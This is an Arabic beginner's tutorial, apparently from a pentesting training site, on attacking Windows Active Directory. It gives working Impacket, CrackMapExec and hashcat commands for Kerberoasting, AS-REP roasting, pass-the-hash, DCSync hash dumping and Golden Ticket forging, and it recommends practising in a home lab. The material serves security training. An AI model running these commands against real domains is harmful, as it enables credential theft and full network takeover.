اختراق Active Directory — الدليل الكامل للمبتدئين 2026
7 سبتمبر 2026 · بواسطة Pentevo
Active Directory (AD) هو قلب معظم شبكات الشركات حول العالم. يتحكم في هوية المستخدمين، الصلاحيات، وموارد الشبكة. اختراقه يعني — في الغالب — اختراق الشركة بالكامل.
لهذا السبب، اختراق AD هو المهارة الأعلى طلبًا في سوق اختبار الاختراق.
كيف يعمل Active Directory (باختصار)
Domain Controller (DC) — الخادم الرئيسي
├── Users (المستخدمون)
├── Computers (الأجهزة)
├── Groups (المجموعات)
└── GPO (سياسات المجموعة)
بروتوكول Kerberos هو نظام المصادقة المستخدم. يعمل عبر "تذاكر" (Tickets):
- TGT (Ticket Granting Ticket): تحصل عليه عند تسجيل الدخول
- TGS (Ticket Granting Service): تحصل عليه للوصول لخدمة محددة
فهم هذا أساسي لفهم الهجمات.
مرحلة الاستطلاع
تعداد الشبكة
# من Kali، بعد الوصول للشبكة
nmap -p 88,389,445,3389 10.0.0.0/24 # 88=Kerberos, 389=LDAP
# تحديد الـ Domain Controller
nmap -p 88 --open 10.0.0.0/24
BloodHound — رسم خارطة AD
BloodHound يرسم العلاقات داخل AD ويكشف مسارات الوصول للـ Domain Admin:
# تثبيت
sudo apt install bloodhound neo4j -y
sudo neo4j start
# جمع البيانات من جهاز Windows موجود في الـ Domain
.\SharpHound.exe -c All
# أو من Kali مباشرةً
bloodhound-python -u 'user' -p 'pass' -d domain.local -ns DC_IP -c All
في واجهة BloodHound: ابحث عن "Shortest Path to Domain Admin" لإيجاد أقصر طريق.
الهجمات الأساسية
1. Kerberoasting
يستهدف حسابات الخدمة (Service Accounts) التي لها SPN. يطلب منها TGS (قابل للاستخراج) ثم يكسر كلمة المرور offline.
# من Kali مع بيانات اعتماد مستخدم عادي:
impacket-GetUserSPNs domain.local/user:password -dc-ip DC_IP -outputfile hashes.txt
# كسر الهاش
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt
السبب: حسابات الخدمة غالبًا تملك كلمات مرور قديمة وضعيفة.
2. AS-REP Roasting
يستهدف الحسابات التي لا تتطلب Pre-Authentication (Kerberos Pre-Auth disabled):
impacket-GetNPUsers domain.local/ -usersfile users.txt -no-pass -dc-ip DC_IP
hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt
3. Pass-the-Hash (PTH)
بعد الحصول على NTLM Hash لمستخدم، تستخدمه مباشرةً دون كسر كلمة المرور:
# دخول باستخدام الهاش مباشرةً
impacket-psexec domain.local/Administrator@DC_IP -hashes :NTLM_HASH_HERE
# أو عبر CrackMapExec
crackmapexec smb 10.0.0.0/24 -u Administrator -H NTLM_HASH --local-auth
4. DCSync — سحب بيانات من DC
بعد الحصول على صلاحيات Replication (عادةً Domain Admin أو مستخدم خاص):
impacket-secretsdump domain.local/Administrator:password@DC_IP
# أو بالهاش
impacket-secretsdump domain.local/Administrator@DC_IP -hashes :HASH
يستخرج جميع NTLM Hashes للمستخدمين — بما فيها KRBTGT hash.
5. Golden Ticket
بعد الحصول على KRBTGT hash (من DCSync)، تصنع تذكرة Kerberos مزوّرة بأي صلاحية تريدها:
# Kerberos Hash Attack with Impacket
impacket-ticketer -nthash KRBTGT_HASH -domain-sid DOMAIN_SID -domain domain.local administrator
# تفعيل التذكرة
export KRB5CCNAME=administrator.ccache
impacket-psexec domain.local/administrator@DC_IP -k -no-pass
هذا يمنحك وصولاً دائمًا حتى بعد تغيير كلمات المرور — ما لم يتم إعادة ضبط KRBTGT hash مرتين.
أدوات اختراق AD الأساسية
| الأداة | الاستخدام |
|---|---|
| BloodHound | رسم العلاقات وإيجاد مسارات الهجوم |
| Impacket | مجموعة أدوات Python للهجمات الشبكية |
| CrackMapExec | فحص الشبكة وتنفيذ الهجمات بسرعة |
| Rubeus | هجمات Kerberos من Windows |
| Mimikatz | استخراج كلمات المرور والـ Hashes |
| Evil-WinRM | Shell عبر WinRM (منفذ 5985) |
بيئة تعلّم AD — خطوات سريعة
- حمّل Windows Server 2022 (نسخة تجريبية 180 يومًا مجانية من Microsoft)
- أنشئ Domain (lab.local مثلاً) وأضف بعض المستخدمين
- حمّل Windows 10/11 وأضفه للـ Domain
- شغّل BloodHound واستكشف العلاقات
- جرّب Kerberoasting على حسابات الخدمة التي أنشأتها
موارد إضافية
- TryHackMe - Attacking Active Directory
- HackTheBox - Forest, Sauna, Resolute (أجهزة AD للمبتدئين)
- CRTO (Certified Red Team Operator) — شهادة متخصصة في Red Teaming وAD
اختراق Active Directory يحتاج ممارسة مستمرة. ابنِ مختبرك المنزلي وجرّب هذه الهجمات في بيئة آمنة.
الأسئلة الشائعة
لماذا Active Directory مهم في اختبار الاختراق؟
أكثر من 95% من شركات Fortune 500 تستخدم Active Directory. اختراق AD غالبًا يعني اختراق البنية التحتية بالكامل — هذا ما يجعله الهدف الأول لمختبري الاختراق والمهاجمين الحقيقيين.
ما البرنامج اللازم لتعلم اختراق AD منزلياً؟
تحتاج: Windows Server 2019/2022 (نسخة تجريبية مجانية 180 يومًا)، Windows 10/11 كجهاز موظف، وKali Linux. كلها تعمل على VirtualBox أو VMware مجانًا.
هل BloodHound مجاني؟
نعم، BloodHound Community Edition مجاني ومفتوح المصدر. BloodHound Enterprise مدفوع للشركات. CE هو ما يحتاجه مختبرو الاختراق.
ما الفرق بين Golden Ticket وSilver Ticket؟
Golden Ticket: تزوير TGT باستخدام KRBTGT hash — صلاحية كاملة على كل النظام. Silver Ticket: تزوير TGS لخدمة محددة فقط — أصعب اكتشافًا لكن أضيق نطاقًا.
مقالات ذات صلة
كسر كلمات المرور — الدليل الكامل: Hashcat وJohn the Ripper 2026
شرح شامل لكسر كلمات المرور في اختبار الاختراق: أنواع الهجمات، Hashcat، John the Ripper، Rainbow Tables، وكيف تحمي كلمات مرورك.
Toolsرفع الصلاحيات في Linux وWindows — الدليل الشامل 2026
شرح كامل لتقنيات رفع الصلاحيات في Linux وWindows: LinPEAS وWinPEAS وGTFOBins والطرق الأكثر شيوعًا في OSCP واختبار الاختراق.
Toolsأدوات Kali Linux الأساسية للمبتدئين في 2026
تعلم أهم أدوات Kali Linux: nmap، Burp Suite، Metasploit، Wireshark، John the Ripper، وغيرها — شرح بالعربي مع أمثلة عملية.
Toolsأوامر Nmap: ورقة الغش العملية (2026)
أوامر Nmap التي ستستخدمها فعلًا — اكتشاف المضيفين، وفحص المنافذ، وكشف الخدمات ونظام التشغيل، والتوقيت، ومحرّك السكربتات NSE — مع أمثلة.
طبّق هذا عمليًا
أكاديمية Pentevo تحوّل هذه المفاهيم إلى دروس موجّهة وفيديوهات واختبارات — مجانًا.
ابدأ التعلّم مجانًا